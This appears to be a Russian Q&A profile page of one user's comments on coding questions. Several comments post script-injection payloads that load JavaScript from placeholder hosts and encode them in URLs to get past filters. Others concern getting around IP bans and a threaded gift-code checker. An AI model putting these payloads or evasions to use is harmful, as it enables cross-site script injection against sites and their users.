• Как склеить первую со второй строку?

    @NO1nam Автор вопроса
    arr = open('text.txt').readlines()
    print('\n'.join([ f'{arr[i]}:{arr[i + 1]}' for i in range(0, len(arr), 2) ]))
    и даёт ошибку IndexError: list index out of range
  • Как получить значение из table и отправить его через post?

    @NO1nam Автор вопроса
    <div id="cc-tabs">
    <ul class="nav nav-pills nav-justified" role="tablist" style="border: 1px solid rgba(255,255,255,0.23) ;">
    <li class="nav-item" role="presentation"><a class="nav-link" role="tab" data-toggle="pill" href="#tab-1" aria-selected="false">Status<p id="statusData" class="dataNums">100%</p></a></li>
    <li class="nav-item" role="presentation"><a class="nav-link active" role="tab" data-toggle="pill" href="#tab-2" aria-selected="true">Valid/Unused<p id="validData" class="dataNums">1</p></a></li>
    <li class="nav-item" role="presentation"><a class="nav-link" role="tab" data-toggle="pill" href="#tab-3" aria-selected="false">Used/Inactive<p id="inactiveData" class="dataNums">0</p></a></li>
    <li class="nav-item" role="presentation"><a class="nav-link" role="tab" data-toggle="pill" href="#tab-4" aria-selected="false">Invalid/Error<p id="errorData" class="dataNums">0</p></a></li>
    </ul>
    <div class="tab-content">
    <div class="tab-pane cc-tab-div" role="tabpanel" id="tab-1">
    <div class="row">
    <div class="col">
    <div class="statusGroup" style="margin-top: 0;"><span class="statusInput">Check Queue:</span><span id="ccs-queue" class="statusInput">1/1</span></div>
    <div class="statusGroup"><span class="statusInput">Remaining:</span><span id="ccs-remaining" class="statusInput">0</span></div>
    <div class="statusGroup"><span class="statusInput">Current Set:</span><span id="ccs-currentset" class="statusInput">Finished!</span></div>
    <div class="statusGroup" style="margin-bottom: 15px;"><span class="statusInput">Estimated Time Left:</span><span id="ccs-timeremaining" class="statusInput">0s</span></div>
    </div>
    <div class="col">
    <div class="card bg-dark text-center" style="background: rgba(52,58,64,0.4) !important;border-style: solid;border-color: rgb(181,181,181);">
    <div class="card-body" style="padding-top: 5px;padding-bottom: 5px;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;-o-user-select: none;user-select: none;">
    <h6 class="card-title" style="margin-bottom: 6px;"><i class="icon ion-android-settings" style="margin-right: 5px;"></i>SETTINGS</h6>
    <div class="col">
    <div class="custom-control custom-switch" style="margin-bottom: 8px;"><input class="custom-control-input" type="checkbox" id="blurCodes" style="display: none;" onclick="blurCodes(this);"><label class="custom-control-label" for="blurCodes">Blur Valid Codes<i class="fa fa-question-circle" data-toggle="tooltip" data-bs-tooltip="" data-placement="right" title="" style="margin-left: 10px;" data-original-title="This option will blur all valid codes. This is especially useful for when you want to take a screenshot of some sort."></i></label></div>
    <div class="custom-control custom-switch" style="margin-bottom: 8px;"><input class="custom-control-input" type="checkbox" id="replaceDuplicates" style="display: none;"><label class="custom-control-label" for="replaceDuplicates">Replace Duplicates<i class="fa fa-question-circle" data-toggle="tooltip" data-bs-tooltip="" data-placement="right" title="" style="margin-left: 10px;" data-original-title="This option will replace a duplicated code on the tables, if it is re-checked again. For example, if the code is checked while valid, then it is used and checked again, the checker will delete it from the valid table."></i></label></div>
    </div>
    <div class="col" style="margin-top: 10px;">
    <p class="d-inline-flex" style="padding-left: 3px;padding-right: 3px;">Threads:</p>
    <div class="btn-group btn-group-sm threads-group" role="group" style="padding-left: 3px;padding-right: 3px;"><button class="btn btn-dark" type="button" title="Slow Internet Connection" value="1">1x</button><button class="btn btn-dark" type="button" title="Normal Internet Connection" value="2" style="background-color: #23272b !important;border-color: #1d2124 !important;">2x</button>
    <button class="btn btn-dark" type="button" title="Fast Internet Connection" value="3">3x</button>
    </div><i class="fa fa-question-circle" data-toggle="tooltip" data-bs-tooltip="" data-placement="right" style="margin-left: 10px;" title="" data-original-title="The higher the threads -> the faster the checker is. However, if your internet speed is slow, increasing this option may slow down the checker or return errors instead."></i></div>
    </div>
    </div>
    </div>
    </div>
    <div class="progress" style="margin-top: 15px;height: 25px;">
    <div class="progress-bar bg-dark progress-bar-striped" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" id="cc-progress" style="transition: 0.5s;width: 100%;">100%</div>
    </div>
    </div>
    <div class="tab-pane cc-tab-div active" role="tabpanel" id="tab-2">
    <div class="table-responsive table-bordered cc-table">
    <table class="table table-bordered table-hover table-dark table-sm table-sort" id="cc-table-valid">
    <thead>
    <tr>
    <th role="columnheader">Code<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Status<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Title<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Description<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">EntitlementName<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    </tr>
    </thead>
    <tbody>
    <tr id="NWPZK-EDUSY-3HCB4-4RQ7W"><td>NWPZK-EDUSY-3HCB4-4RQ7W</td><td>Used</td><td>Bhangra Boogie</td><td>Celebrate together.</td><td>FN_Phodan</td></tr>
    </tbody>
    </table>
    </div>
    </div>
    <div class="tab-pane cc-tab-div" role="tabpanel" id="tab-3">
    <div class="table-responsive table-bordered cc-table">
    <table class="table table-bordered table-hover table-dark table-sm table-sort" id="cc-table-inactive">
    <thead>
    <tr>
    <th role="columnheader">Code<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Status<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Title<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Description<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">EntitlementName<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    </tr>
    </thead>
    <tbody></tbody>
    </table>
    </div>
    </div>
    <div class="tab-pane cc-tab-div" role="tabpanel" id="tab-4">
    <div class="table-responsive table-bordered cc-table">
    <table class="table table-bordered table-hover table-dark table-sm table-sort" id="cc-table-error">
    <thead>
    <tr>
    <th role="columnheader">Code<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Status<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    <th role="columnheader">Message<i class="fas fa-sort-alpha-up float-right tableSortIcon"></i></th>
    </tr>
    </thead>
    <tbody></tbody>
    </table>
    </div>
    </div>
    </div>
    </div>

    пример как будет code в table
  • Как получить значение из table и отправить его через post?

    @NO1nam Автор вопроса
    если в таблицу пусто что бы нечего не отправлял а как только появится что-то то сразу отправил запрос
  • Как получить значение из table и отправить его через post?

    @NO1nam Автор вопроса
    но не совсем получил то что я хотел а именно отправить запрос только тогда когда видит новый код в table
  • Как закрыть одно поля если другое открыто?

    @NO1nam Автор вопроса
    Вот моя форма
    <div class="form__group">
                    <p class="form__text">Способ связи</p>
                    <label for="call" class="form__group-item">
    				<button class="btn js-btn-age-test" id='showCallme'>Звонок</button>
                    </label>
                    <label for="telegram" class="form__group-item">
    					<button class="btn js-btn-age-test" id='show'>Telegram</button>
                    </label>
                    <label for="whatsapp" class="form__group-item">
    					<button class="btn js-btn-age-test" id='showWhatsapps'>WhatsApp</button>
                    </label>
                </div>
            </div>
            <div class="form__wrapper">
                <div class="form__group">
    		<div id="show" class="hidden">
    		<p class="form__text">Звонок</p>
    		<input class="input" type="text" placeholder="Ваше имя*" name="name">
    		<input class="input js-phone" type="tel" placeholder="Телефон*" name="phone" im-insert="true">
    		</div>
    		
    		<div id="showTelegram" class="hidden">
    		<p class="form__text">Telegram</p>
    		<input class="input" type="text" placeholder="@username" name="name">
    		</div>
    		<div id="show" class="hidden">
    		<p class="form__text">WhatsApp</p>
    		<input class="input" type="text" placeholder="Ваше имя*" name="name">
    		<input class="input js-phone" type="tel" placeholder="Телефон*" name="phone" im-insert="true">
    		</div>
    <script>    
    allShowButtons = document.querySelectorAll(.show);
    allHiddenForm = document.querySelectorAll(.hidden);
    //потом цыклом прикрепляем всем функцию для показа при клике
    for(let i =0;i<allShowButtons.length;i++){
          allShowButtons[i].onclick = showForm;
    }
    //далее  пишем функцию showForm
    function showForm() {
    ///сначала в цыкле скрываем все form чтобы потом ниже в коде показать нужный
    for(let i = 0;i<allHiddenForm.length;i++){
          allHiddenForm[i].style.display = "none";
    } 
    //Проверяем по отличающимуся классу кнопки, на какую кнопку нажали,
    //так как в this попадает та кнопка по которой кликнули, и затем находим тот
    //скрытый form на кнопку которой нажали, далее проверками получаем нужный
    //скрытый div и в самом низу делаем его display блоком
    if(this.classList.contains(showTelegram)){
         showDiv = document.querySelector(#telegram);}///тут нужно написать id соответствующего скрытого дива
    else if(this.classList.contains(showNumber)){
         showDiv = document.querySelector(#number);
    }
    else{
         showDiv = document.querySelector(#whatsup);
    }
      showDiv.style.display = "block";
    }
    </script>
                                </div>
                            <button class="form__btn btn">Записаться</button>
                <input name="type" type="hidden" value="request">
            </div>
        </form>
        <button class="modal__close btn-secondary js-modal-close" type="button">
            <svg class="icon">
                <use xlink:href="#close"/>
            </svg>
        </button>
    </section>

    Что-то не получается
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    Сергей Горностаев, а как быть с этим ? если мне нужно найти это элемент
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    Сергей Горностаев, Вы были правь блокировали IP за парса вырубил его и отправляю много запрос и не блокирует
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    Kit Scribe, проблема в том что не блокирует сразу а через несколько попыток если использовать requests
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    Kit Scribe, да нет там примой бан по ip если я его просто меняю через vpn сайт опять работает
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    Да я вроде все передал что можно было
  • Почему блокирует ip через request?

    @NO1nam Автор вопроса
    думаешь вся проблема в том что я делаю парс что бы найти нужный элемент на странице ?
  • Чем заменить script?

    @NO1nam Автор вопроса
    сам<script></script> удаляет остаётся так"><scr=http://site.com/xxx.js></>
  • Как импортировать куки?

    @NO1nam Автор вопроса
    Дмитрий Беляев, заменить старые куки на новые
  • Как импортировать куки?

    @NO1nam Автор вопроса
    У меня приходит в один формат куки а там просит вообще в другой и уже устал всегда делать вручную эти куки в json
  • Почему лагает браузер при запуске javascript?

    @NO1nam Автор вопроса
    Вопрос все еще актуален
  • Как зашифровать ссылку?

    @NO1nam Автор вопроса
    twobomb, вставил
    http://site.com/vasea?id=IiZndDsmbHQ7c2NyaXB0IHNjcj1odHRwOi8vZG9tYWluLmNvbS9zY3JpcHQuanMmZ3Q7Jmx0Oy9zY3JpcHQmZ3Q7
    (мой код который шифровал ) и он нечего не выполнят
  • Как зашифровать ссылку?

    @NO1nam Автор вопроса
    twobomb, а в адрес как использовать его ? data:text/javascript;base64,IiZndDsmbHQ7c2NyaXB0IHNjcj1odHRwOi8vZG9tYWluLmNvbS9zY3JpcHQuanMmZ3Q7Jmx0Oy9zY3JpcHQmZ3Q7 так ?
  • Как зашифровать ссылку?

    @NO1nam Автор вопроса
    Что-то не очень понял как работает и куда вести ссылку
  • Как зашифровать ссылку?

    @NO1nam Автор вопроса
    Сергей Соколов, да нужно что бы мой скрипт оказалось в нужной странице